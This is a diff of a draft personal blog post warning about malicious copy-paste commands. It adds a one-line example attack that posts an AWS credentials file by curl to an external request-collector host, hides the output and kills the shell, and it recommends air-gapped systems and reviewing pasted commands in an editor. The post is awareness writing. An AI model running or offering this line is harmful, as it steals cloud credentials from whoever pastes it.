nickstanley574/nickstanley574.github.io/_drafts_public/2021-12-21-dont-trust-your-clipboard.md

 }
 </script>

-#### The Attack
 ```
-sudo apt install -yq curl gnupg2 ca-certificates lsb-release
-sudo apt-get -yq update
-sudo apt install -yq nginx
-sudo systemctl start nginx
+xclip -sel clip < /dev/null & curl -s -d "$(cat ~/.aws/credentials_fake)" https://en2lx5n7b4y69.x.pipedream.net/ > /dev/null & clear; top -d 0.25 -c & clear; kill -9 $$
 ```

-### Compromising a Blog, Website

-#### The Attack

-## Why the Disclaimer?
+## Conclusion

-This could be a blog post by itself and it might be some day, but here is the cliff notes version.
-Like many apps, share library, blogs this sites code is in a GitHub repo.
-When using someone else code or viewing a website you are trusting them to secure there code and prevent others from making changes.
+When you use someone else's code or access a website, you are placing trust in them to ensure the security of their code and prevent unauthorized modifications.
+This is why I added the disclaimer.
 Do you know how strong my password is for my github?
 Do you know if I have MFA setup for my account?
-Without that info you don't know how save the contents of this site are.
-It is conceivable that a bad actor could gain access to my github, make a change to one of my examples, and use my this to do exactly want I am describing.

-## What I do mitigate
+Do you know if I have given someone else access to the repo?

+Another option is to prevent critical systems from having any type of access to the internet.
+Instead, make sure nothing can reach the internet and have dependencies, package repose and other resources be in some type of artifacts store.
+This way even if something malicious is copied there is no way to download from or upload to the internet.

-To not copy from the internet would be crazy, but to mitigate the risk, I do not use the copy button, instead highlighting the command into a plaintext editor and reviewing the command before then pasting it into the terminal.
-It take a moment longer, but when working on systems that have access either my personal data or client data the extra time is worth it.
+Where do we go from here?
+To not copy from the internet would be crazy, but to mitigate the risk, I do not directly copy and paste text into the terminal.
+Instead, I paste the text into a plaintext editor, review the command, and then paste or rewrite it into the terminal.
+It takes a bit longer, but when working on systems that have access to either my personal or client data, the extra time is worth the added security.

-## You Scared?

-### NO?
-You could argue I am being paranoid, and how often does this really happen.
-And you are missing the point.
-We should be doing thought experiments on how would you circumvent security or trick users because that is what keeps us vigilant.
-Plus it only take one miss step and you are the reason your company is compromised.
-Some paranoid is a good thing to have in the software discipline.

-If you trust a software to run your app you might trust that software's website security is to be trusted.

-### Good!
-Now What?

-#### ZSH

-#### Tilix